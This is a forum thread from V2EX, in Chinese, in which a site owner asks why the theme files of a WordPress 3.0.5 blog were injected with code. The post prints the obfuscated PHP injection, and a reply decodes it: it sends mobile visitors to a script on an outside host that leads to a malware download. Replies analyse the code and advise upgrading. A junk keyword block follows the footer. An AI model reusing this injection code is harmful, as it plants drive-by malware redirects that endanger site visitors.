wordpress主题被恶意篡改怎么办?版本3.0.5 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
webgeekman
V2EX    问与答

wordpress主题被恶意篡改怎么办?版本3.0.5

  •  
  •   webgeekman 2012-11-21 20:46:48 +08:00 4011 次点击
    这是一个创建于 4707 天前的主题,其中的信息可能已经有所发展或是发生改变。
    已经第二次了,主题所有文件权限被修改成不可写,并且被添加如下代码:
    <?php
    $_ = strrev('tressa'); @$_("e\166\141\154\050b\141\163\145\066\064\137\144\145\143\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0IHNyYz0iaHR0cDovL21vYmlsZS1jb250ZW50LmluZm8vanF1ZXJ5LTEuNy4xLmpzIj48L3NjcmlwdD4nOyBmbHVzaCgpOyBleGl0OyB9'\051\051\073");
    ?>
    与提供主机服务的国内某主机提供商技术交涉,对方认为不是服务器被入侵。是我程序的漏洞导致的。Wordpress有这种漏洞吗?
    14 条回复    1970-01-01 08:00:00 +08:00
    liliang13
        1
    liliang13  
       2012-11-21 20:58:00 +08:00
    为什么不升最新版呢

    旧版是有漏洞的。
    manhere
        2
    manhere  
       2012-11-21 20:59:44 +08:00   1
    楼主位代码转换为:
    <?php
    if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script src="http://mobile-content.info/jquery-1.7.1.js"></script>'; flush(); exit; }
    ?>
    工具: http://ddecode.com/phpdecoder/?results=a83df371e20876a7bf0ea4622a63b559

    没看出有什么恶意来,似乎是移动端判断?
    Brutal
        3
    Brutal  
       2012-11-21 21:04:27 +08:00
    @manhere 移动端判断完后载入 http://mobile-content.info/jquery-1.7.1.js
    这个文件里是
    window.location = "http://operanew-in.mobi/?stream=2091&type=auto";

    打开后是个俄文网站,然后提示下载 Opera.jar

    orz
    alexrezit
        4
    alexrezit  
       2012-11-21 21:18:58 +08:00
    每次 WP 升级都有一大批不更新的 blog 沦陷... 而且据很多 php 程序员讲 WP 的代码其实很烂 (真的吗?).
    webgeekman
        5
    webgeekman  
    OP
       2012-11-21 21:29:17 +08:00
    诚心求教@manhere 转换方法!!!这是用的什么机制,见笑了从未听说过。
    @manhere 说的没错。的确跳转并下载。不过在国内由于有GFW,效果不是很理想,但导致网站完全无法访问了。
    Yooguo
        6
    Yooguo  
       2012-11-21 21:32:47 +08:00
    为什么不升级?
    webgeekman
        7
    webgeekman  
    OP
       2012-11-21 21:32:53 +08:00
    @alexrezit 作为一个成熟的开发者,不要轻信道听途说。建议到官方下载源码自己体会一下吧。
    个人感觉有好的地方,也有坏的地方,不能一概而论,并且wordpress好多思想还是非常棒的!只是执行效率真心不高。
    webgeekman
        8
    webgeekman  
    OP
       2012-11-21 21:34:05 +08:00
    @Yooguo
    @liliang13

    因为。。。。。。。懒!!!:(
    Yooguo
        9
    Yooguo  
       2012-11-21 21:35:15 +08:00
    后台直接升级很快的呀 最好还是升级到最新版本吧
    alexrezit
        10
    alexrezit  
       2012-11-21 21:37:15 +08:00
    @webgeekman 我不是搞 php 的, 所以才会问嘛.
    manhere
        11
    manhere  
       2012-11-21 21:44:29 +08:00   1
    @webgeekman 转换方法上面写了呀:
    在线工具 http://ddecode.com/phpdecoder/
    Sivan
        12
    Sivan  
       2012-11-21 21:46:11 +08:00
    也可能是主题漏洞喔~升级 WP 后看看还有没有这个情况。
    zhouzb889
        13
    zhouzb889  
       2012-11-22 00:01:14 +08:00
    这种问题要么主题,要么主机的问题,从这两方面入手。
    webgeekman
        14
    webgeekman  
    OP
       2012-11-22 17:03:30 +08:00
    @manhere 多谢咸蛋孟达兄!!!
    @alexrezit wordpress整体来说还不错。做简单的东西可以考虑。
    @Yooguo 必须升级了。
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     953 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 23ms UTC 22:51 PVG 06:51 LAX 15:51 JFK 18:51
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86